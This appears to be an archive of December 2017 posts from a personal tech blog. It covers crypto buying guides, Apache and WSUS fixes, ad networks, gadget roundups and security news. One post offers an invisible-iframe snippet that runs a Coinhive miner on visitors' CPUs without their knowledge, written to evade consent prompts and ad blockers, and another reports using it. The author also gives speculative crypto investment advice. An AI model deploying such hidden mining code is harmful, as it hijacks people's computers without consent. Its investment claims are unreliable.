Dec 30, 2017

How to buy Ripple (XRP) using Coinbase and Binance in 5 steps

Ripple is surging like crazy right now. In the last day or so it's surpassed Ethereum in market capitalization to now be the number two cryptocurrency in the world! Some are attributing this to a new deal between Ripple and Japanese credit card companies.

Via CNBC:
Ripple rose 20 percent Wednesday to an all-time high. 
The gains followed news that Tokyo-based financial services company SBI Holdings and its subsidiary SBI Ripple Asia announced the establishment of a "consortium" with some Japanese credit card companies to utilize blockchain technology, according to an online translation of a release. Ripple and SBI Holdings created SBI Ripple Asia in January 2016. It wasn't clear what the extent of Ripple's involvement would be in the new consortium. 
The digital currency rose 20 percent to a record high of $1.43, making it the third-largest cryptocurrency by market capitalization at $54 billion, behind bitcoin and ethereum, according to CoinMarketCap. 
At the time of this writing Ripple is now trading at around $2.38. If you think about it for a minute, Bitcoin was trading at this price in 2011. Can you imagine getting into Bitcoin at this price? That's what is getting a lot of people asking how exactly they can buy Ripple, especially in the United States!

Sadly, Coinbase, one of the largest US cryptocurrency exchanges does not yet support Ripple. Currently they only support Bitcoin, Bitcoin Cash, Ethereum and Litecoin. However, they do support converting US Dollars into these four, and that's where we are going to start.

  1. Buy some Bitcoin using Coinbase. If you don't yet have an account, get one. You can purchase Bitcoin using credit card or bank transfer.
  2. If you don't have one, sign up for an account on Binance. Binance is a cryptocurrency to cryptocurrency market place. Have some Litecoin and want to buy Bitcoin? You can do it on Binance.
  3. Transfer the Bitcoin you purchased on Coinbase to your Bitcoin wallet on Binance.
  4. Head over to the Ripple (XRP) to Bitcoin (BTC) exchange page on Binance.
  5. At the bottom of the page, you can buy Ripple with your Bitcoins!

You can essentially do the same if you wanted to buy Ripple with Litecoin (Which is what I did to buy my first XRP Tokens), Ethereum or Bitcoin Cash. You can transfer your alt-coins to your wallet on Binance, exchange them for Bitcoins, then buy Ripple with your Bitcoins. You don't need to wait for Coinbase to start supporting it!

Are you looking to get into Ripple? Why or why not? Let us know in the comments!

Dec 29, 2017

How is Linux built?



While Linux is running our phones, friend requests, tweets, financial trades, ATMs and more, most of us don't know how it's actually built. This short video takes you inside the process by which the largest collaborative development project in the history of computing is organized. Based on the annual report "Who Writes Linux," this is a powerful and inspiring story of how Linux has become a community-driven phenomenon.



Dec 28, 2017

Big banks are getting on the blockchain bandwagon

Bitcoin, and other cryptocurrencies were originally created to bypass central banks and put the power of currency in the hands of the individual. It was also created so governments and banking institutions couldn't control the flow of money, and in essence, control the funding of speech and other ideals. Just look at what happened to Wikileaks.

Well just as many libertarians were popping champagne bottles over the success of Bitcoin in 2017, it looks like their enemies, central bankers, are now getting on the blockchain train.

Via Wolf Street:
As a general rule, most bankers disparage cryptocurrencies, like Bitcoin, as anything but purely speculative instruments. But they don’t disparage blockchain, the technology that underpins cryptocurrencies. On the contrary. They’re pouring money into developing their own “digital currencies,” as they call them. Just don’t call them “cryptocurrencies.” 
UBS, BNY Mellon, Deutsche Bank, Santander, the market operator ICAP, and the startup Clearmatics formed an alliance in 2016 to explore the use of digital currency between financial institutions and central banks, using blockchain. 
The ultimate goal of the project is to create a digital currency known as Utility Settlement Coin (USC), which will facilitate payment and settlement for institutional financial markets. As the FT reported in October, commercial banks are growing tired of waiting for central bankers to take the lead in fending off the challenge that standalone cryptocurrencies such as bitcoin could pose to their control of monetary policy, and are pressing on with their own pet projects.
Does this mean the end of Bitcoin? Probably not. In fact, this to me appears as the natural evolution of the blockchain technology in general. When you look at what the value of the underlining technology that Bitcoin has given the world, the idea that big banks and other countries adopting it in some form or another makes a lot of sense.

In fact, RT just reported the other day that Israel is looking to replace cash with their own digital-shekel.
For several months the Bank of Israel has been considering issuing a state-sponsored virtual currency, reports the Jerusalem Post. The digital shekel will be identical in value to the traditional shekel. 
According to an unnamed Israeli finance official, the digital shekel will record every transaction by mobile phone. It will allow the Israeli government to reduce the amount of cash in circulation to fight tax evasion and money laundering. The so-called black economy in Israel accounts for 22 percent of the country’s GDP, statistics showed. 
The digital shekel will be exactly like cash, but instead of coins in a wallet, there will be codes in a cellphone. Transactions with the cryptocurrency will be made immediately, unlike with a bank transfer or check, which takes a few days to clear.
This, my friends, is the future of money. This is also why Bitcoin and other digital currencies are so valuable right now. The solutions they provide to the money/banking industry are so vastly innovative and revolutionary. In ten years, every aspect of your monetary transactions will be using blockchain technology in some manner or another.

What do you think about this? Let us know in the comments!

Dec 27, 2017

Script For Configuring Ubuntu Server Easily

I work in a big VMware environment. Something like 95% of our servers are virtual. That makes things real easy for me when someone wants a new server for something. I can spin a new server up in just a few minutes, and just a few clicks of a button.

One of the things VMware gives us is the ability to create virtual machine templates. Also, with templates we can also do really cool things like sysprep Windows templates at the time of deployment, and it’s all built right into vSphere. One thing I like to do also is have a template of Ubuntu Linux on hand in case I want to setup a quick Linux server. For Linux, I prefer to use Open-VM-Tools instead of the native VMware tools for Linux. For me it is just easier to install, and I can update the tools easily with a quick apt-get update.

The drawback to using Open-VM-Tools though is I lose the ability to customize Ubuntu servers at deployment time using the VMware deployment wizard. Sure, I can fill out all the stuff, but when that server is done deploying, none of the static IP info is saved, the hostname hasn’t changed etc.

To fix that, I added this quick little shell script in the home directory of my sudo user. That way, when I deploy a server, all I have to do is login, run that quick script, and I now have my customized server in a matter of minutes.

You can download my script here: (Ubuntu Config Script)

Bauer-Power-Script

Make sure to make the script executable by running the following:
sudo chmod +x ubuntuconfig.sh
What my script does is creates new hostname, hosts and interfaces config files, changes the old ones to .old, replaces them then reboots. Just follow the prompts to your statically IP’d new Ubuntu server install!

del.icio.us Tags: ,,,,,

Dec 26, 2017

A quick reference chart to subnetting and subnet masks

No matter what everyone is saying, IPv4 is still widely used in internal networks. Just look at any home wireless router these days. Just about none of them come pre-configured for IPv6. The same goes for most businesses. Unless you are a giant corporation, or you run an ISP company, the demand for IPv6 for the internal network hasn't grown all that much. At least, not from what I've seen.

That being said, the ability to know subnetting, and carve out IPv4 networks is still a valuable skill to know. Sure, there are subnet calculators available, but sometimes having a quick reference chart available that you can tack to your cubicle wall is more handy.

So, I give you my subnetting reference chart!

It will give you a quick reference to the CIDR format (Number of bits in a subnet mask) how many hosts per subnet, usable hosts and the actual subnet mask! You can't make it more easy!

Feel free to print it out, share it with your friends, or use it for your next certification exam!

Dec 25, 2017

Merry Christmas! Enjoy this free 4 hour hacking course!



Everything you need to get started as a hacker and take your hacking skills to an expert level is included in this free screen capture HD video tutorial course!


Begin with the basics of hacking including what is ethical hacking, introduction to hacking terms, and how hackers setup their computers. Follow along as you see exactly what software you need including VirtualBox and Kali Linux. See what to do next after you download VirtualBox, create your virtual environment, and install Kali Linux. Meet the Linux terminal you will use to do your work in including the basic functionalities and Linux Command Line Interface (CLI). See how to navigate in Kali Linux and then get started with the real hacking! Learn Tor, proxychains, Virtual Private Networks (VPN), Macchanger, Nmap, and get an introduction to wifi hacker cracking for WPA and WPA2 security with aircrack and reaver.  See a live usage example of aircrack and see how to get all of your questions answered!

Dec 23, 2017

Easily the best alternative to Google Adsense I've found

I mentioned a little while ago that I was going to test out monetization using Coinhive. Well, it was an interesting concept, but in practice it really wasn't that profitable. Even when I tried setting it to auto-run in the background, it just wasn't worth the effort. I've decided to ditch that completely.

That being said, I have found a new advertising service that so far seems to be generating numbers I used to see when I was using Google Adsense years ago! Before this, the only advertising service that made me any kind of money on a monthly basis was Amazon CPM ads, but they removed Bauer-Power's eligibility too. I just don't get it!

Now, at the end of 2017 and going into 2018 I've found a Google Adsense alternative that is really generating some numbers for me! It's called The Monetizer!

Check out their video:



Here is the reporting of my earnings since I started using their ad service at the beginning of December. My highest earnings day I made $4.41, which may not sound like a lot, but on my best day with Amazon CPM, I only made $0.71!



These are way closer to what I remember I would see near the end of my Google Adsense run, and so far I am really excited about it!

At the time of this writing, I've already earned over $30 in less than a month. That is over half of what I earned in a year with AdBuff!

There is a catch with The Moneytizer though. You can't just add any old website.

From their FAQ's:

  • You must be the owner of the website (or in charge of its monetization). You need to place our ads.txt file at the root directory of your website as a proof that you are the owner of the website (more information here)
  • If you are hosted on a blog platform, you must get approval for displaying external ads.
  • In order to guarantee the quality of our offer, we deny access to The Moneytizer to any website with content we consider inappropriate (ex: website with illegal downloading, streaming, peer to peer, adult content, racist, extremist etc.)
  • Your website must attract at least 10 000 unique visitors per month and the main part of your trafic must comme from geographic areas we can easily monetize (North America, South America, Europe).
  • We can also deny access to The Moneytizer when a website has too many ads. A website overcrowded with ads is not well monetized.
  • Finally, your website must not contain pop-under, site-under etc.

If your website meets their standards, then you should definitely give them a try! Click here (The Moneytizer) and let them know that www.Bauer-Power.net sent you!

Do you already use The Monetizer? How do you like them? Let us know in the comments!


Dec 22, 2017

#Bitcoin plummeted last night, but experts are telling people to hold

Last night was a real shit storm for Bitcoin, where it plummeted 33% in one of the biggest drops in recent weeks. The drop has left many novice traders worried and ready to pull out now.

From Ars Technica:
After rocketing to a high above $19,500 last Sunday, bitcoin's price has been steadily dropping this week. Those losses accelerated overnight, with the cryptocurrency falling below $13,000. 
Bitcoin's losses come amid a broad cryptocurrency selloff. As of Friday morning, every major cryptocurrency was posting double-digit 24-hour losses. Ethereum is down 28 percent over the last 24 hours, Bitcoin Cash is down 37 percent, and Litecoin is down 32 percent. 
To be fair, all of these currencies—like bitcoin—have seen massive gains in recent weeks. They're all well above their value at the start of December, to say nothing of values earlier in the year.
Just a few hours ago, the price of Bitcoin actually dropped briefly to around $11,000 which prompted Coinbase, one of the nation's top crypto currency market places, to temporarily stop trading.



From CNBC:
Coinbase, one of the biggest bitcoin marketplaces in the U.S., said Friday that trading was temporarily disabled amid a price rout in cryptocurrencies. 
"Investigating - All buys and sells have been temporarily disabled. We are working on a fix and apologize for any inconvenience," Coinbase said on its status website at 11:11 a.m., ET
The company added in a subsequent statement that "due to today's high traffic, buys and sells may be temporarily offline. We're working on restoring full availability as soon as possible."
Despite this huge drop, many experts are saying that this is actually not the bursting of the bubble, that many people think.

Bitcoin pioneer, Charlie Shrem tweeted:


Critical Care physician, and apparent Bitcoin investor Robert Reid tweeted:


Finally, Max Keiser of The Keiser Report tweeted:



I'm no expert myself, but I have heard lots of experts say that they expect Bitcoin to hit at least $100,000 in the long run. Investing is not a get rich quick sprint, it's a slow and steady marathon. We know that prices can reach upwards of $20,000 at the very least, so buying when they are down at around $12,000 doesn't seem like a bad move at all in my opinion.

What do you think? Let us know in the comments!

Search engine to help you find Linux alternatives to Windows programs

I pride myself on creating Bauer-Power years ago, and have it be a great resource in finding not just Windows program alternatives, but alternatives to expensive software in general. I am not a software developer, so my philosophy in technology has always been to spend more money on the hardware, and run open source whenever possible.

That is why when I found a search engine that is dedicated to doing the same, I figured I should share it with you! The search engine is called Awesome Cow!

From their page:
AwesomeCow.com - a search engine designed to help those who want to start using Linux, but this search can be useful for advanced Linux users too. 
Search is simple to use - you simply enter the name of the program that runs on Windows and the search provides you with a Linux program alternative that can perform the same or has a similarly functionality. 
Testing it out, I did a quick search for Adobe Premiere:



And it came back with two Linux alternatives, PiTiVi and Cinelerra!


Pretty slick right? Bookmark it, and the next time you're thinking of blowing your money on expensive software, find an alternative and spend that money on a RAM upgrade or something!

Dec 21, 2017

I've saved my first $1000 using Acorns!

I first wrote about mindless investing using the Acorns app back in April. Well, in just 8 months, I'm proud to say that I've finally hit my first $1,000 using the app! It may not sound like much, but it is when you consider how difficult it is to save money sometimes. With this app, you just sit back and it takes care of everything for you!



As I mentioned in the article back in April, you set the app to auto invest money once a month. I have it set to save just $5. On top of that it rounds up every purchase you make to the nearest dollar, then takes that difference and automatically socks it away for you into an investment account where it can grow much faster than it could in a typical savings account.

You can also set what kind of performance level you want to see. Since I'm still relatively young, I have mine set at the aggressive level, which is riskier, but yields a bigger return. Here is a look at my performance over the last 6 months!



As you can see, the market gain has made me an additional 6.29% on top of what I've socked away! Let's see your savings account do that with today's interest rates!

I can't say enough good things about Acorns! I really think everyone should give it a try. Especially those who find it difficult to save money.

Dec 20, 2017

How to limit bandwidth for WSUS downloads

I have been a WSUS user for years. Although there are better patch management tools out there that are also way more expensive, WSUS still manages to stick around and get the job done... For Microsoft related updates at least.

Anyway, for the last two months we've been getting hit with bandwidth overage charges at my day job. We have a 6Mbps circuit that is burstable to 10Mbps. Anything over 6Mbps results in overage charges which are not well received by upper management.

Here is a look at the past week from our ISP's perspective:

Here is a look at our WSUS server's network interface usage:


It's pretty obvious don't you think? On top of that I ran a data collection from our firewall starting around the time of the spikes and the number one visited URL was wsus.ds.download.windowsupdate.com. Clearly, it's WSUS that is causing us overages!

Well there is good news. You can easily throttle the bandwidth WSUS uses using a local computer policy! 

To do it, just do the following on your WSUS server :
  • Log on to the server by using an account that is a member of the local Administrators group.
  • Click Start, click Run, type gpedit.msc, and then press ENTER.
  • In the left pane of the Group Policy Management Console (GPMC), expand Computer Configuration, expand Administrative Templates, expand Network, and then click Background Intelligent Transfer Service.
  • In the Setting pane, double-click Limit the maximum network bandwidth for BITS background transfers.
  • In the top pane of the dialog box, click Enabled.
  • In the Options pane, set the transfer rate in kilobits per second (Kbps) that you want BITS to use. The default value is 10 Kbps.
  • Set the times during which you want to limit bandwidth. The default setting is from 12:00 A.M. to 12:00 A.M.
  • Set the limitations to use outside the designated time. The default setting is Use all available unused bandwidth.
  • Click OK to save the settings.
I wanted to keep my WSUS server under the 6Mbps mark, so I set mine to limit bandwidth to 4Mbps (4000 Kbps) between the hours of 9pm to 6am.


After setting this, no more spikes and no more overage charges! Boom!

Did this help you out? Let us know in the comments!
[H/T MSDN

Dec 19, 2017

I've decided to ditch Coinhive

I wrote a little while back that I was going to give Coinhive a shot for monetizing Bauer-Power. I also published a story this morning on how I tested loading Coinhive shortlinks in an invisible iFrame to make it more worth my while.

I actually wrote that post last week (It just published this morning), and after letting it run for a week, I've determined that Coinhive mining from my blog just wasn't profitable. I've ran Coinhive banners since the beginning of the month, and implemented the hidden iFrames last week. Even with that, I've only mined 0.01681 XMR which at the time of this writing is only worth about $6.34. Sorry, I can make better money using other advertising services. In fact, I started using a new one that I will write about this Saturday!

All I can say about this whole experiment is that it was worth a shot! It might be worth while for sites that do a few million page views per month, but unfortunately, Bauer-Power doesn't.


How to make Coinhive autostart in the background when someone visits your site

I wrote a little while back that I was going to give Coinhive a shot for monetizing Bauer-Power. The sucky thing about it is that using their Simple Miner UI, it requires users to actively press the start button to start the mining process. I'm going on on a limb here to say that 99.999999% of the people visiting your website won't click the start button at all. People want their free content, and they don't want to throw anyone a bone. That's why AdBlock is so popular...

According to Coinhive's documentation, they did this because AdBlockers were blocking their miners.

From their page:
Shortly after the launch of Coinhive, several Adblockers have begun blocking our miner. This is unfortunate because we intended Coinhive to be an alternative to ads, precisely for users with adblockers. 
However, we have to acknowledge that the decision to block Coinhive was understandable as it was possible to run the miner on a webpage without asking the visitor for consent or even informing them. Even some antiviruses now consider our JavaScript miner as a threat, which makes it difficult for website owners to use Coinhive at all. 
We implemented AuthedMine as a solution to these problems. The JavaScript Miner, Simple UI and Captcha, when loaded from authedmine.com, will never start without asking for consent from the user or (for the Simple UI and the Captcha) letting them explicitly start mining through a click. 
We realize this opt-in may be clunky and not fit all too well with your use case, but we strongly believe that being honest with the user will ultimately be beneficial - for users and website owners alike. 
Neither the JavaScript files on authedmine.com nor the domain names are currently blocked by any adblockers or antiviruses. We will talk to adblock and antivirus vendors so it will hopefully stay this way.
Basically, they load their tools now from authedmine.com to avoid AdBlockers and letting users opt in. You can also try loading their JavaScript miner from https://coinhive.com/lib/coinhive.min.js, but they don't recommend it, and it will most likely get blocked by an AdBlocker.

So what is one to do as an alternative? Well, here is something that works for me. You can load a Coinhive shortlink in a hidden iFrame instead! What is a shortlink? I'm glad you asked!

From their page:
If you have a URL you'd like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solve a number of hashes (adjustable by you) and is automatically forwarded to the target URL afterwards.
Basically it is like TinyURL or IS.GD but before the user is redirected, they have to do some mining for you. You can set the hash limit from 256 hashes up!

The code example below loads in an invisible iFrame, and once the visitor's CPU computes 512 hashes, it gets redirected to a Wikipedia post about Monero. Users never see it though. In my example link I set the hash limit relatively low so it will mine quick, and then stop quick... So as not to be a complete asshole!

The example code is:

<iframe src="https://cnhv.co/q5p9" style="border: 0; border: none; height: 0; width: 0;"></iframe>


It really can't be any simpler than that!

Are you going to give this a try? Let us know in the comments!

Dec 18, 2017

What's a computer? Does Apple think we're really this stupid?



In the above pretentious as fuck advertisement for the iPad Pro with iOS 11, Apple says we may be closer to a PC free world than we think. How do they say it though? They take a nerdy girl, and make her ask "What's a computer?"

I hate Apple, and all Apple products. Mainly because they are all over priced proprietary pieces of shit. I also hate them for this bullshit. Apple must really think people are stupid!

News flash, just because you have an Apple logo on your tablet, does not make it somehow NOT a computer. Everyone knows what a computer is too, and Apple's overpriced hardware is still at the end of the day, just a fucking computer!

Don't pretend that it isn't, and we won't pretend that your shit isn't made for non-tech savvy idiots!

Deal?

Dec 16, 2017

The FCC's regulations on the internet have been killed. Are we "feeballing" again? #NetNeutrality

I have been a pretty big proponent of actual Net Neutrality. By that I mean that I feel that governments and ISP's should leave the Internet the hell alone! The Internet is the ultimate experiment in human freedom, and the sharing of limitless information is incredibly valuable.

So like many people, I have fallen in with those on "the left" when it started to become apparent that the FCC was going to repeal Obama era regulations to "protect the Internet". However, the following from Reason TV has started making think that this recent action from the FCC might not be as bad as I had thought.

Via Reason TV:
Progressives are freaking out now that the Federal Communications Commission (FCC) is beginning the repeal of Net Neutrality regulations, which give the government the right to regulate Internet Service Providers (ISPs). 
The main arguments in favor of Net Neutrality are really arguments guarding against hypotheticals: that ISPs could otherwise block and censor content (they never have) or that they'll run their operations like shakedowns, requiring content providers to pay up or slow their traffic to molasses. The main documented instance of an ISP favoring one content provider over others wasn't sinister collusion. Metro PCS offered unlimited YouTube in a budget data plan but not unlimited Hulu and Netflix, because YouTube had a compression system that could be adapted to the carrier's low-bandwidth network. In a different context, critics might have applauded Metro PCS, since bought by T-Mobile, for bringing more options to lower-income customers. 
Net Neutrality is a proxy battle over what type of internet we want to have—one characterized by technocratic regulations or one based on innovation and emergent order. Progessives are generally suspicious of complex systems existing without powerful regulators present and accounted for. Small-government folks are repulsed by bureaucrats in general, and think the internet will fair better in a state of benign neglect. The FCC has come down on the side of an organic internet, instead of treating the internet more like a public utility. 
We don't know how the internet is going to evolve over time, but neither do the government administrators trying to rein it in. But given the record of free-market innovation vs. government-regulated services, the odds are with market forces and entrepreneurs.
If the above isn't doing it for you, their video does the best job in my opinion:




After watching the video above, has it changed your mind about Net Neutrality? I mean, we really want to keep the creepy government's fingers out of it don't we?

Let us know what you think about this either way in the comments!

Dec 15, 2017

htaccess not working with https on Apache

I noticed an issue the other day on a Wordpress server I manage that runs on Ubuntu. We have several virtual directories on that server that use rewrite rules in an htaccess file to present content from a different website. If we use http, it works great! If we use https, we get a page cannot be found error.

What gives?

Well, it turns out that out of the box the /etc/apache2/sites-available/default-ssl has the following setting:

        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

The above setting makes it so that Apache ignores your htaccess file.

The highlighted items are what we need to change. You need to change AllowOveride None to AllowOveride All (or to whatever you have in your 000-default.conf file). See below:

        <Directory />
                Options FollowSymLinks
                AllowOverride All
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>

After making the change, you need to restart the Apache daemon:
#sudo service apache2 restart
Once Apache restarts, you your rewrite rules should now work over https!

Dec 14, 2017

How Secure Is Your Operating System?

Ever wonder how secure your information truly is? What security protocols do you practice? Maybe creating a password? Locking the computer so others cannot access your data? Bypassing windows passwords only takes a minute or less and the windows 10 installation disk. Thus far, I have been successful in using the Windows 10 disk to bypass account passwords and even activating deactivated accounts on Windows Server 2012, Windows 10, Windows 7, and Windows 8.1. I have yet to test the technique to bypass locked computer accounts in Windows XP and Vista, but I do not foresee any complications with those operating systems.

Before you think this makes you safer because you use Mac OS X. I have also been able to bypass root level account passwords on a MacBook Pro, running Mac OS X (10.10) Yosemite operating system, using built-in Apple commands. This method also took less than a minute to accomplish.

The security implemented in an operating system and accounts always has a level of vulnerability. Most security measures are feel good methods. Username and passwords, for example, represent single level authentication, identifying who you are, the username and proof that you are who you are, the password. It is said for modern security protocols to require the username to be unique and the password to have a minimum of 16 characters and a random combination of uppercase, lowercase, numbers and special characters to be utilized. 16 digits the extent of the average person to remember their own passwords. With the growing technological advancements of computer processing power, such passwords will eventually be capable of being broken in shorter amounts of time, eventually making them completely useless. Most operating systems store username and password combinations as hash algorithms in specific files that can be viewed as plain text, resulting in the need for passwords to be ultimately obsolete.

Stating those facts does not mean "So, why bother?" with username and passwords. Passwords do stop the average person from gaining access and some level of security is better than no level of security. There, of course, are other ways to better secure your operating systems, preventing the method mentioned here from being capable of being utilized. Data at rest encryption, for example, is an option at the operating system level. This means a decryption process must occur prior to the operating system boot.

2 factor and 3-factor authentication also increase the security level of your operating system. CAC (Common Access Cac) cards, commonly utilized by the DoD and other government agencies are a prime example of 2-factor authentication. The first factor, requiring the card itself that maintains encrypted certificates to identify who you are and who you say you are, plus the second factor of a pin as secondary proof. 3-factor authentication would include features such as biometrics. Keep in mind, even with all of these methods being utilized. There is no such thing as a 100% secure system.

Dec 13, 2017

10 Upcoming Gadgets and Technologies to Change the World

Digital technology has come a long way through all leaps and bounds over the past five years. Cloud computing, smartphones, and multi-touch tablets are the innovations which revolutionized our personal and work life. Well, it's just a beginning. Technology will get even better. In the near future, we could lead a life just like in sci-fi movies.

So, get ready to slice Ninja fruits through your gestures and control the desktop with eyes, print your own physical product, and enter into the virtual world and experience virtual reality. Here's is the rundown of top 10 real-life, upcoming gadgets and technologies which will change the world.

Google Glass

Augmented Reality is already here in the forms of simulated education and experiment app. But Google has taken multiple steps ahead by launching Google Glass. Theoretically, you can view your texts, social feeds, Google Maps and navigate through GPS. You can also get updates on the ground. Currently, it is offered only to some developers at $1500. But other tech companies are working and trying to build an affordable variant for commercial sales.

Form 1

3D printing could forge any digital design into a real-life product. It is nothing new for the mechanical industry but a 3D printer is surely a revolutionary idea. Everyone can create their own product with their unique design and you don't need any approval from any company. Even Aston Martin in a James Bond movie was a 3D printed product which was crashed for a scene.

Form 1 is a personal 3D printer you could buy at $2799. It seems a very hefty price but you can produce your own prototypes with it. Imagine a day when any professional can mass produce their own physical products without any limits.

Oculus Rift

Oculus Rift is a 3D headset which would bring virtual reality to life. It allows you feel that you are actually in a video game mentally. In its virtual world, you could view the world in HD display with very low latency by just turning the head around. Several premium products can do the same but Rift gives that experience at just $300. It is the beginning of next-gen gaming revolution.

The world is bombarded with VR gadgets. So, the timing is right to be immersed in the whole virtual world. Oculus Rift is the first step to reach such level of realism.

Leap Motion

The concept of a multi-touch desktop is miserably failed because hands could get too tired for long use. But Leap Motion could come with a more innovative idea. You can control your desktop with fingers, without having to touch the screen.

Unlike a usual motion sensor, Leap Motion enables the user to zoom in the photos and map, scroll a web page, sign documents and also play FPS game with just finger and hand movements. A smooth reaction is a very important part of it. This future tech could be yours at just $70. You could buy a PS3 premium game title for this price. If it could work with Oculus Rift, it could definitely give a great makeover to your real-time gaming.

Smart Things

In most devices, the existing problem is that they work standalone and it needs effort for tech leaders to partner with one another and build products that can connect to one another. With Smart Things, you can make every digital to connect together, whether digital or not. You can easily get your humidity, vibration and pressure sensors, and smoke alarms to detect things and alert you by using your smartphone.

You can also track who has been in your house, turn the lights on when entering the room, and shut the doors and windows while leaving the house, all with a gadget which could cost around $500.

Eye Tribe

Eye tracking has been discussed actively by tech lovers already but it is not that simple to implement. But it is not so for Eye Tribe. They created a technology successfully that can let you control the tablet, play flight simulator and even play Fruit Ninja with just eye movements.

Basically, it's just an eye-tracking technology which can be combined with a front camera and some serious computerized algorithm. In LeWeb, a live demo was done this year and we may see it in action in future. The company is still looking for partnership to bring this tech to the market.

Firefox OS

As we all know, there is no competition for Android and iOS. But both of them have their own policies and rules which inhibit the developers and their creative efforts. Since then, Mozilla decided to develop a new mobile OS from the very beginning, which will focus on freedom, true openness, and user's choice.

It's Firefox OS which is built on Gecko, Gonk, and Gaia software layers. It means it is completely open source and carries HTML5 and CSS3 technologies.

Developers can debut apps without blockade of needs set by stores. Hence, users could also personalize the OS as per their needs. Currently, it is available for Android-compatible devices. It can be used to do basic tasks that you do on Android or iOS devices, such as browsing the web, calling friends, playing games, etc.

Project Fiona

Razer's Project Fiona is supposed to be the first generation of gaming tablet. It is seriously built for hardcore gaming. Tech companies might also develop their tablets that are dedicated to gaming. It features Intel Core i7 CPU to play all the PC games you love at the palm of your hands. Razer has developed user experience just on the tablet, along with magnetometer, 3-axis gyro, accelerometer and multi-touch UI.

Parallella

It will clearly redefine the way computers are made. It is simply a supercomputer for all. It is a power-saving computer built to process complex program efficiently and simultaneously. It will make holographic heads-up display, real-time object tracking, and speech recognition even smarter and stronger.

Driverless Car by Google

We all have imagined driverless car to be real someday. Finally, Google has made it happen. It works on artificial intelligence which gets input from video cameras in it, a sensor on the top, and some position sensors and radar in various positions of the car. A lot of research and development has been done to imitate the human intelligence.

Dec 12, 2017

When I made this video, #Bitcoin was trading for $12.83



I made this video for my old Tech Chop video series back in October of 2012! When this video came out, nobody really had heard about Bitcoin at that time. It was trading for roughly $12.83 per Bitcoin then, and mining was still relatively profitable. Now mining has stopped being profitable, but since Bitcoin is now trading at around $18,000 people are still making money!


Bitcoin mining itself isn't profitable anymore, but you can still get into cryptocurrency mining, and transfer your earnings into something worthwhile like Bitcoin, Litecoin or Ethereum using MinerGate! Check them out!


Google Creates More Magic With Pixel 2

Google Pixel 2 XL
Google has raised the curtain on the newest edition of its Pixel phone line and Android fans will not be disappointed.

A worthy successor to the original Pixel, the Pixel 2 combines an outstanding camera with reliable software and an attractive design, all in an aluminum waterproof package.

The phone is available in two sizes the Pixel 2 and Pixel 2 XL. Unlike Apple and other manufacturers the large and small versions both are identical in guts and performance.

Look under the hat and you'll find the same Snapdragon 835 processor, 4 gigs of RAM, and the same 64 or 128 gigs of storage. The camera is the same as well. Both run Android Oreo with no bloating or customizing to the operating system. Battery life is around 7 hours with only 15 minutes of charging. Since it is "pure Android" users will get security updates and more features faster than other phones.

Screen size is the big difference between the phones. The smaller version has a five inch 1920 x 1080 OLED screen. The larger version has a higher-res 6 inch screen with a 2880 x 1440 display. The larger phone also has a rounded bezel and bigger battery.

Google has added a few design elements to the Pixel for a better experience. The search bar has been moved down to the bottom of the home screen, so it can be reached more easily. A new widget will show you useful information like the weather or your next appointment. An always-on display lets you know the time and any new notifications.

Throw around some more magical dust and you get an app called "Now Playing". It automatically identifies whatever music is playing nearby whether you are in a bar, restaurant or other place. It downloads a list of similar songs to your phone. You can then select if you wish to listen to them.

For most, the camera is king when it comes to cell phones and Pixel 2 continues the excellent reputation of its predecessor. The photos are sharp with soft background portrait shots. The 12.2 rear megapixel camera, and 8 MP up front, are fast and extremely impressive in low light.

The Pixel's video capabilities will also turn heads. It can shoot slow-motion video at up to 240 frames per second. 4K shooting can be done at 30 frames per second. Google also touts the phone's ability to combine optical and electrical image stabilization so your video is smooth even in the roughest conditions.

Worried about storage? Google says no need. Pixel provides unlimited and free photo and video storage, even in 4k.

You can also search "what you see" with Google Lens. Do more searching by voice or with a squeeze of the device.

Since it is a Google phone it comes with all company accoutrements working in tandem between the phone's Google Assistant with Google Home and Chromecast. Like most phones there is no headphone jack but Pixel Bud wireless headphones are reportedly on the way soon.

Colors include "Just Black", "Clearly White", and "Kinda Blue" for the Pixel 2 with the "Just Black" and "Black and White" available in the XL model.

Pricing starts at $649 for the Pixel 2 and $849 for the XL.

Though perhaps lacking behind the Samsung Galaxy Note 8 in performance options, and in price, Google has waived its wand and created a worthy competitor in the cellphone marketplace. The Pixel 2 should certainly generate many "oohs and ahhs" among Android fans.


About the author:
George Rosenthal is a founder and partner with ThrottleNet Inc.. ThrottleNet offers an array of technology services and products to help business owners achieve their corporate goals and accelerate business growth. These include cloud computing, custom software and mobile application development, and outsourced Managed Network Services which helps companies improve their technology uptime and IT capabilities while, at the same time, reduces costs. To learn how to accelerate your IT visit ThrottleNet online at http://www.throttlenet.com.

Dec 11, 2017

If you have an HP laptop, you might have a keylogger installed

HP has done it again. They have screwed over their customers by leaving something nasty installed in over 460 of their laptop models. This nasty thing is a keylogger program that can be used by hackers to log your every keystroke allowing them to capture your most sensitive passwords!

This isn't the first time they've done this either! Back in May, security researchers discovered a keylogger hidden in HP's audio drivers. ZeroHedge recently reported about spyware being pre-installed on HP computers as well! How low will these guys stoop to snoop on their customers?

Well, this time the keylogger was found in the touchpad driver.



Via The Hacker News:
A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details. 
The Keylogger was found embedded in the SynTP.sys file, a part of Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers. 
Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable built-in keylogger "by setting a registry value." 
Here’s the location of the registry key:
  • HKLM\Software\Synaptics\%ProductName%
  • HKLM\Software\Synaptics\%ProductName%\Default
The researcher reported the keylogger component to HP last month, and the company acknowledges the presence of keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed.

Normally to combat bullshit bloatware that hardware manufacturers install by default, I recommend wiping out the OEM operating system and do a fresh install. The problem this time is that the keylogger is contained in the drivers! That means when you go to HP's website to get the correct drivers, the keylogger will still get installed! It's pretty messed up!

I guess you really have two options here:

  • Stop buying HP products
  • Stop using Windows and switch to Ubuntu or some other flavor of Linux
What do you think about this? Let us know in the comments!

